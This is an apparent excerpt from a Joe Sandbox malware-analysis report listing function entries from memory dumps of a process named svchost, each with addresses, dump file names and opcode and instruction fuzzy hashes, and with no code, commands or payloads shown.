                                                                    Function 0365D090 Relevance: .2, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                    • Instruction ID: f8037da70403c99489649c026d356e9af231e6c65b59dac8a39e5c8a44cbe037
                                                                    • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                    • Instruction Fuzzy Hash: 00818E76E001198BEF24CF58C9807AEFBB6FB84354F19816BD815BB384D6329A45CB91
                                                                    Function 0366E284 Relevance: .2, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                                                    • Instruction ID: 1a67cb47911470719adf8e82fc76fc8aa272ef0936939d76771c26d0d59d1e21
                                                                    • Opcode Fuzzy Hash: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                                                    • Instruction Fuzzy Hash: 2C815E75A00609AFDB25CBA9C980AEAF7F9FB88384F14442DE555A7250D731AC05CB60
                                                                    Function 0365B950 Relevance: .2, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                                                    • Instruction ID: 0ae3eea919f807434a1953d7e50e4b019f2c5b91369d1de5c44610cbfdf9a765
                                                                    • Opcode Fuzzy Hash: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                                                    • Instruction Fuzzy Hash: 5271C7346047509EEB24CE2ACA40736B7E5EB85714F18856EFC96CB2C4D7B6E806CB61
                                                                    Function 0364C640 Relevance: .2, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb0f011c51619f7cec4628a63d1ee9c49a6d7f692afe9c6647173d1907d2e3c9
                                                                    • Instruction ID: d78069826596cbd17330e0451963b1a27972ff8b0ea2748a3b3424b81ec231b4
                                                                    • Opcode Fuzzy Hash: bb0f011c51619f7cec4628a63d1ee9c49a6d7f692afe9c6647173d1907d2e3c9
                                                                    • Instruction Fuzzy Hash: 5171CDB5C01265EFDB25CF59CA90BBEBBB8FF59700F14815AE842AB350D7749805CBA0
                                                                    Function 036EDAC6 Relevance: .2, Instructions: 202COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                                                    • Instruction ID: 8b854468e276c8476428b1a367887518a6f4f2a1eebc4c13a754978c32bc8bd1
                                                                    • Opcode Fuzzy Hash: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                                                    • Instruction Fuzzy Hash: 0C819C70D01295DFCB24CF69C544AAAFBF8EF4AB40F048499E495AB385D374D84ADF50
                                                                    Function 036F70E9 Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 639fef1e490ce4c2c61962a0b95768f5e26272217cca1204fc4e69a4cc9fcc53
                                                                    • Instruction ID: b003d8db531e16824c7676788ddca76f53365e4caca47227c4874edc23a3fbb0
                                                                    • Opcode Fuzzy Hash: 639fef1e490ce4c2c61962a0b95768f5e26272217cca1204fc4e69a4cc9fcc53
                                                                    • Instruction Fuzzy Hash: E061E675E0031AAFCB14EFA5C9909BFB779BF44250F18443DEA11AB340EB70DA458B94
                                                                    Function 0364260B Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 208346eb7f87a7c0ecb17b14af5c3a2d18d29146cdc4b81340e45a65a3cf7c2b
                                                                    • Instruction ID: decb789639a239043cab116933174a021144745e51cb887863042d431e93a760
                                                                    • Opcode Fuzzy Hash: 208346eb7f87a7c0ecb17b14af5c3a2d18d29146cdc4b81340e45a65a3cf7c2b
                                                                    • Instruction Fuzzy Hash: 2971FE35A042419FC711DF28C594B2AB7E5FF88310F1989AAF898CF351DB38D846CB95
                                                                    Function 036EF0CC Relevance: .2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04a3d5c1e8e25ba7574f272d288289ceab5831dd468fb67ec5a26ee6a8e3bd48
                                                                    • Instruction ID: e2468e63476af102b0709065359b63408975719935c7a0752c0d06d3852affa6
                                                                    • Opcode Fuzzy Hash: 04a3d5c1e8e25ba7574f272d288289ceab5831dd468fb67ec5a26ee6a8e3bd48
                                                                    • Instruction Fuzzy Hash: F3719E79A02626DFCB24CF9AC18017AF7F1FF44704B6A846ED8829B340D774E949CB54
                                                                    Function 036B035C Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                    • Instruction ID: 35b803e2ab36ec9705f0c9b3b70212a901829f2ee47b6f0d795e72b294d94cc6
                                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                    • Instruction Fuzzy Hash: BB716B75E00619EFCB10DFA9CA84AEEBBB8FF48700F144569E505AB250DB34EA41CF94
                                                                    Function 036C62A0 Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21bdefe6108605049e7dce725450c4a4b25fe5c7b578731b31581206d73de3d9
                                                                    • Instruction ID: d5c8f88d227f57253c383c21e2cc4e3cd425ba37781e207dfb3c8f7ea8e6b2f8
                                                                    • Opcode Fuzzy Hash: 21bdefe6108605049e7dce725450c4a4b25fe5c7b578731b31581206d73de3d9
                                                                    • Instruction Fuzzy Hash: D771E036210B41AFDB31DF14C954FAAB7F5EF44720F18892CE25A8B2A0D775E944CB68
                                                                    Function 036F7A46 Relevance: .2, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 68142294780f686403e4c1f7f1426f4e1bd83127541c79945fa94bdfc57a1e13
                                                                    • Instruction ID: ef162676e53af56f39261f11303c063ea0dfc95e5d7fade823796eb5625df1fc
                                                                    • Opcode Fuzzy Hash: 68142294780f686403e4c1f7f1426f4e1bd83127541c79945fa94bdfc57a1e13
                                                                    • Instruction Fuzzy Hash: 30513B75A002265FCB14DF69C9809BBB7F6EF89350B18416DEE54DB384DA74C902C7A0
                                                                    Function 036F132D Relevance: .2, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c91f650bbfc793c7a5bc2976267a9925a564d03caa64b514040a4e3b415c9ed5
                                                                    • Instruction ID: 15b7e737806495607a0bc157775fb08c7e72acf0169751ff5b7369b038bb5abb
                                                                    • Opcode Fuzzy Hash: c91f650bbfc793c7a5bc2976267a9925a564d03caa64b514040a4e3b415c9ed5
                                                                    • Instruction Fuzzy Hash: 49817E75A00205DFCB09CF99C590AAEBBF1FF89300F1981A9D859EB345D734EA41CBA0
                                                                    Function 036F903E Relevance: .2, Instructions: 186COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9af7fc8813de00e087411fc7e5ec898275a6ba926eee7f98e31a9705abba8ccd
                                                                    • Instruction ID: 461870715d29ca222a21e8ed430d8c9b956f787eb67ae72bde94843e4c71fe58
                                                                    • Opcode Fuzzy Hash: 9af7fc8813de00e087411fc7e5ec898275a6ba926eee7f98e31a9705abba8ccd
                                                                    • Instruction Fuzzy Hash: 6161CC75600715AFD325DF68C884BABBBE9FF88710F04462DFA698B240DB30E915CB95
                                                                    Function 03637703 Relevance: .2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c0531631bfa3d7f786e88e9e5ddfea147bb1bec59aa25da243d0d601c9f8663
                                                                    • Instruction ID: 222c25edfafa8b674be168b22a680d711611927cd274aecb31174e0bb7116505
                                                                    • Opcode Fuzzy Hash: 1c0531631bfa3d7f786e88e9e5ddfea147bb1bec59aa25da243d0d601c9f8663
                                                                    • Instruction Fuzzy Hash: 4D6171B5E00606EFDB18DF68C580AADFBB5FF49200F28816ED41AA7340DB34A941CBD4
                                                                    Function 036F92A6 Relevance: .2, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2776435e76de65acb8fa2e0aee5ab31f5a73616f827973d2a1156ff82a3746cf
                                                                    • Instruction ID: 0e1f9ef6a2a6f5d0e59359404c383ed785f92965b5c88482d23fccbcfac008bc
                                                                    • Opcode Fuzzy Hash: 2776435e76de65acb8fa2e0aee5ab31f5a73616f827973d2a1156ff82a3746cf
                                                                    • Instruction Fuzzy Hash: 6F6123366087828FD311CF68C994B6AF7E0FF90308F18446DEA858B391DB35E806CB95
                                                                    Function 036FCE93 Relevance: .2, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                    • Instruction ID: 7c1468e05b9f31db678fa29b6f3e63f490db3e028f827be93118f4daf0f1e0be
                                                                    • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                    • Instruction Fuzzy Hash: A1512532A0570A5FC714DE2D896076BFBD6AFC1250F1D846DEA95CB349DA30D80AC7A1
                                                                    Function 004102C3 Relevance: .2, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                    • Instruction ID: e82671514e6d504b4874043159b623d1472596ab17aadc8b612a8f8d473aa75f
                                                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                    • Instruction Fuzzy Hash: 8E5182B3E14A254BD3188E09CC40631B792EFD8312B5F81BEDD199B357CA74E9529A90
                                                                    Function 004102BB Relevance: .2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49ac52f7360f855142113685e169e833d7cfac3d0cca899976f1fef0572b123f
                                                                    • Instruction ID: a6e6d6d11569dda07a21aa818068f65f290ca0ae1b96a277d30a711e805e15bf
                                                                    • Opcode Fuzzy Hash: 49ac52f7360f855142113685e169e833d7cfac3d0cca899976f1fef0572b123f
                                                                    • Instruction Fuzzy Hash: A45191B3E14A214BD3188F09CC40632B692EFD8312B5F81BEDD199B357CA74E9529A90
                                                                    Function 036F7D73 Relevance: .2, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12e32c0b87a895ce91df1aa249d19bdccc70af789c9d5979bb4bb0909ad7d13d
                                                                    • Instruction ID: aa344be711c2de1ba2d381045dfe9f6be60ee47bf3cd1b64c3736f1c280b8d40
                                                                    • Opcode Fuzzy Hash: 12e32c0b87a895ce91df1aa249d19bdccc70af789c9d5979bb4bb0909ad7d13d
                                                                    • Instruction Fuzzy Hash: EB51D336A1014A8FCB08CF78C580AAEB7F2EF98314F19827AD915DB355E734DA15CB90
                                                                    Function 03643740 Relevance: .2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f40afd76d8d565180b37e4499208b3a0bba190d5996a4e092d487dd1788578ee
                                                                    • Instruction ID: faa70022b36dc77a4e0c06dab12faccfd0572e441dc1a8d62209a065a4dfe4dc
                                                                    • Opcode Fuzzy Hash: f40afd76d8d565180b37e4499208b3a0bba190d5996a4e092d487dd1788578ee
                                                                    • Instruction Fuzzy Hash: 90511179E00616AFC711CF68C5846A9F7B4FF04710F2882A9E895DB340E734E9A2CBC4
                                                                    Function 03637152 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb90fda7ba80f7d8499ee4eace8020f4fdd81288cfe1f3049b024cc9006c28ec
                                                                    • Instruction ID: 7d2753ac1b5af3622ec39de07ed4d55cb8179e706136dd480b80266561563438
                                                                    • Opcode Fuzzy Hash: fb90fda7ba80f7d8499ee4eace8020f4fdd81288cfe1f3049b024cc9006c28ec
                                                                    • Instruction Fuzzy Hash: 3751F575A0060AEFEF15DF64CA48BBDBBB8FF06315F28416AE5129B390D7749911CB80
                                                                    Function 036B3A6C Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 548a3cca632219e9cd8638b15e69810c280806ac0908395f6cfeb75c8e1ce7af
                                                                    • Instruction ID: 721a16358ae03dbf56ae58306a7445d56037f8300cc94dab52905105b1bdc5cf
                                                                    • Opcode Fuzzy Hash: 548a3cca632219e9cd8638b15e69810c280806ac0908395f6cfeb75c8e1ce7af
                                                                    • Instruction Fuzzy Hash: AC51CE36E4012D4BEF24CA58D461BEFB3F2EB55310F580829E945BB3C4C2B66996DA50
                                                                    Function 036FD26B Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                    • Instruction ID: 2fd7bebbd16a37d994dbf3d2a4a01dc0bf5cf676a1d52ec6765cc8d8f5e2f174
                                                                    • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                    • Instruction Fuzzy Hash: 84516C766087429FC311CF28C884B5ABBE6FFC8244F04892DFA948B344D734E905CB66
                                                                    Function 036F7571 Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 171e25396b15af0846b0b071e51ed67e70c5ba1530437cbab5ece1acf4dbc6ea
                                                                    • Instruction ID: c4cdd14e5db27b95e89cf58162e458b7e65c6769af810efdbd9d2719d0222ca6
                                                                    • Opcode Fuzzy Hash: 171e25396b15af0846b0b071e51ed67e70c5ba1530437cbab5ece1acf4dbc6ea
                                                                    • Instruction Fuzzy Hash: 8151F531A00219AFCB15DF69D844A7EFBB9FF48380F088169EA01E7254DB74AD21CB80
                                                                    Function 036351ED Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 122ae876d6ff0062b076d71d1045259fb5e2b1784f6ce163a955b639dfeee6d1
                                                                    • Instruction ID: 1082093f7c95a9d01b25a81fc827af86a955f38039b45dcd7e40f87ea4131398
                                                                    • Opcode Fuzzy Hash: 122ae876d6ff0062b076d71d1045259fb5e2b1784f6ce163a955b639dfeee6d1
                                                                    • Instruction Fuzzy Hash: B851CE35A05314DFEF21DBA9C940BADB7B8BF0B314F080059DA52EB250E7B49941CB9A
                                                                    Function 0366F71F Relevance: .1, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad0b6443e170e3536d9145e42aa38cf09a746b5908e8e34f5b696f0a25c51b38
                                                                    • Instruction ID: 4c65c2824555ea8ef85264724f2fbeab0a1398675af40600bf7bdcc10cc246fa
                                                                    • Opcode Fuzzy Hash: ad0b6443e170e3536d9145e42aa38cf09a746b5908e8e34f5b696f0a25c51b38
                                                                    • Instruction Fuzzy Hash: 2C416A76D04229ABDB11EBA8D944ABFBBBCAF05694F55017AE901EB300D634DE01C7E4
                                                                    Function 036601F8 Relevance: .1, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d81a3f8a790e7789bb9f01174c25539e48b1118e11ad885240bb97173c6d237c
                                                                    • Instruction ID: debba310208f16cd1a82f50b5d3354cab5fb10ae212b4bee4cf8caa082f5392c
                                                                    • Opcode Fuzzy Hash: d81a3f8a790e7789bb9f01174c25539e48b1118e11ad885240bb97173c6d237c
                                                                    • Instruction Fuzzy Hash: F341AD769042159BCB14DFA8C540AEEF7B8BF88750F18816AE816FB340D7359C41CBA8
                                                                    Function 03672750 Relevance: .1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                    • Instruction ID: b3b157616bd89e908750c71b94d5e8ed0ca1d1aaa751516e8dc03b55ea6bd349
                                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                    • Instruction Fuzzy Hash: 83512A75A00615DFCB15CF98C580AAEF7B6FF84710F2885AAD855EB350D734AE42CBA0
                                                                    Function 03636154 Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f273def9b9e1945961c2bcd4e2af1ff23cef55f4584d0b88565d72d55a93da89
                                                                    • Instruction ID: 9a788a4c9f965f7b1af20188744243cbced872d2beb3577c613879583b1c7773
                                                                    • Opcode Fuzzy Hash: f273def9b9e1945961c2bcd4e2af1ff23cef55f4584d0b88565d72d55a93da89
                                                                    • Instruction Fuzzy Hash: E0512970904616EBDB25DB24CD54BA8BBB5FF02314F1982EAD4259B3C1D7789981CF88
                                                                    Function 0362B136 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b67d68022d66fa06cc01659ba2967865d2344f060b8f2dfc46bc4196688080ec
                                                                    • Instruction ID: 3fccd3aba55d79927c02f78ed7c2a65a21e9fd620b739825b5d92540c1e51367
                                                                    • Opcode Fuzzy Hash: b67d68022d66fa06cc01659ba2967865d2344f060b8f2dfc46bc4196688080ec
                                                                    • Instruction Fuzzy Hash: 6941CCB5641B11EFDB21EF68C984B2ABFE8EF05794F098479E5119B290D774D800CFA8
                                                                    Function 036FF0E0 Relevance: .1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8668bcc51ddf247ef8e0333cf7d655999b817e5156124e42bfce94729749b6c2
                                                                    • Instruction ID: 62ce54444d58db12cddb00c34901aca9232bc58a2031df96da8b1426f4526fa6
                                                                    • Opcode Fuzzy Hash: 8668bcc51ddf247ef8e0333cf7d655999b817e5156124e42bfce94729749b6c2
                                                                    • Instruction Fuzzy Hash: DA41E1752183418FC704CF25D8A587BBBE1FF85225F088A5EF9958B382C730D809CB61
                                                                    Function 036F866E Relevance: .1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
